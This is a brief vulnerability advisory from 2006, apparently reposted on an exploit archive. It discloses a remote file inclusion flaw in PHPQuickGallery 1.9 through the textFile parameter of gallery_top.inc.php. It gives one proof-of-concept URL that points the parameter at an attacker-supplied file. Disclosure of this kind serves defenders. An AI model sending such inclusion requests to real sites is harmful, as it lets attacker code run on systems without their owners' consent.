id: 1183
date: 11/19/2006
title: PHPQuickGallery <= 1.9 (textFile) Remote File Include Vulnerability
author: Al7ejaz Hacker
cves: 

===================================================================
PHPQuickGallery <= 1.9 (textFile) Remote File Include Vulnerability
===================================================================



============================================================================
+                                                                          =
+                     PhpQuickGallery  Remot File Include
+                                                                          =
+
+===========================================================================
+
+
+
+Script: phpquickgallery
+
+RisQe : Dangeureuse
+
+Type: Remot File Include
+
+File Infected : gallery_top.inc.php
+
+Credit By: Al7ejaz Hacker
+============================================================================
+
+
++++++++++++
+Exploit : +
++++++++++++
+
+http://localhost/phpquickgallery/gallery_top.inc.php?textFile=Attacker
+
+
+
+Discoverd By Al7ejaz Hacker
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




#  0day.today [2023-03-25]  #